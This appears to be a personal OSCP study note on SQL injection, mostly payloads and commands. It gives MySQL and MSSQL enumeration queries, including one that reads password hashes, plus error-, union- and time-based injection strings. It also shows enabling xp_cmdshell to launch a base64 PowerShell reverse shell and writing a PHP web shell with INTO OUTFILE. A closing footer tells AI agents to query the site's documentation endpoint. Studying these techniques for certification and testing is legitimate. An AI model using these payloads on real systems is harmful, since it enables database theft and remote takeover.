# SQL Injection (SQLi)

## Enumeration

### MySQL

[MySQL ](https://dev.mysql.com/doc/)is a popular open-source relational database management system (RDBMS) often used in web applications. It’s a common target for attackers due to its widespread use and the potential to expose sensitive data through SQL injection or other vulnerabilities.

connect to `mysql` remotely

```bash
mysql -u root -p'root' -h 192.168.191.16 -P 3306
```

retrieve the version of the running SQL instance

```sql
select version();
```

retrieve the current username and hostname for the MySQL connection.

```sql
select system_user();
```

list all of the databases running in the MYSQL session.

```sql
show databases;
```

retrieve mysql user password hash

```sql
select user, authentication_string from mysql.user where user = '<username>';
```

A trick to output vertically and get normal formatting

```bash
select * from mysql.user where user = 'offsec'\G;
```

### MSSQL

[MSSQL](http://www.microsoft.com/sqlserver) is a database management system that natively integrates into the Windows ecosystem.

* Windows has a built-in command-line tool named [*SQLCMD*](https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility), that allows SQL queries to be run through the Windows command prompt or even remotely from another machine.

connect to mssql using windows authentication

```bash
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
```

retrieve the version of the running SQL instance

```sql
select @@version;
```

list all of the databases running in the MYSQL session.

```sql
select name from sys.databases;
```

list `dbo` users of the current database

```sql
select * from offsec.dbo.users;
```

list all of the database tables

```sql
select * from offsec.information_schema.tables;
```

## Manual Exploitation

### Error Based

**Error-based SQL injection** relies on extracting information from the database by triggering error messages that reveal valuable details.

The following examples show how to trigger errors and extract information using Error-Based injection:

```sql
' or 1=1 in (select @@version)-- -
```

```sql
' or 1=1 in (select password from users where username = 'admin')-- -
```

### **Union Based**

**Union-based SQL injection** enables attackers to concatenate results of malicious query with a legitimate one by using `union` operator, allowing them to retrieve additional information from other tables.

In order to make the **union-based SQL injection** work, the attacker must satisfy two conditions:

1. Ensure that the **number of columns** in the injected query match those of the original query .

The number of columns can be found using `ORDER BY` and incrementing the number until the query failed:

```
' ORDER BY 1-- -
' ORDER BY 2-- -
' ORDER BY 3-- -
' ORDER BY 4-- -
etc...
```

It's less recommended but it possible also to enumerate the number of columns using `UNION` and `NULL` values until the query works:

```
' UNION SELECT NULL-- -
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL-- -
etc...
```

2. Ensure that the **data types** in the injected query match those of the original query.

The following examples describes the process of finding string column, when the query works means the column using `'a'` is a string column.

```
' UNION SELECT 'a',NULL,NULL,NULL-- -
' UNION SELECT NULL,'a',NULL,NULL-- -
' UNION SELECT NULL,NULL,'a',NULL-- -
' UNION SELECT NULL,NULL,NULL,'a'-- -
etc...
```

### Boolean-Based

**Boolean-based SQL injection** is used in case the query does not reflect the results of the injected query, so it relies on extracting information by using conditions and changes of the web application.

```
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //
```

### MSSQL System Procedures&#x20;

SQL Server supports the following system stored procedures that provide an interface from an instance of SQL Server to external programs, for various maintenance activities.

* [xp\_cmdshell](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15)
* [xp\_enumgroups](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-enumgroups-transact-sql?view=sql-server-ver15)
* [xp\_grantlogin](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-grantlogin-transact-sql?view=sql-server-ver15)
* [xp\_logevent](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-logevent-transact-sql?view=sql-server-ver15)
* [xp\_logininfo](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-logininfo-transact-sql?view=sql-server-ver15)
* [xp\_msver](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-msver-transact-sql?view=sql-server-ver15)
* [xp\_revokelogin](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-revokelogin-transact-sql?view=sql-server-ver15)
* [xp\_sprintf](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-sprintf-transact-sql?view=sql-server-ver15)
* [xp\_sqlmaint](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-sqlmaint-transact-sql?view=sql-server-ver15)
* [xp\_sscanf](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-sscanf-transact-sql?view=sql-server-ver15)

**xp\_cmdshell** procedure allows **sysadmin** to execute os commands

Enable `xp_cmdshell` procedure:

```sql
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

exec('sp_configure''show+advanced+option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')
```

Execute commands using `xp_cmdshell:`

```sql
EXECUTE xp_cmdshell 'whoami';

exec master..xp_cmdshell 'powershell -e <base64_revshell>'
```

### Create Files

It's possible to create a file on the server disk using SQL query for example:

```sql
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/tmp/webshell.php"
```

## Automated Exploitation

**sqlmap** is a tool which used to automate exploit a SQLi vulnerability given request with the vulnerable parameter.

**sqlmap** is **not allowed** in the OSCP exam so I won't dig in it.

```bash
sqlmap -r request.txt -p item 
```

{% embed url="<https://github.com/sqlmapproject/sqlmap>" %}
sqlmap - automated sqli tool
{% endembed %}

## References

{% embed url="<https://learn.microsoft.com/en-us/sql/sql-server>" %}

{% embed url="<https://dev.mysql.com/doc/>" %}

{% embed url="<https://portswigger.net/web-security/sql-injection/cheat-sheet>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dudisamarel.gitbook.io/oscp-notes/web-attacks/sql-injection-sqli.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.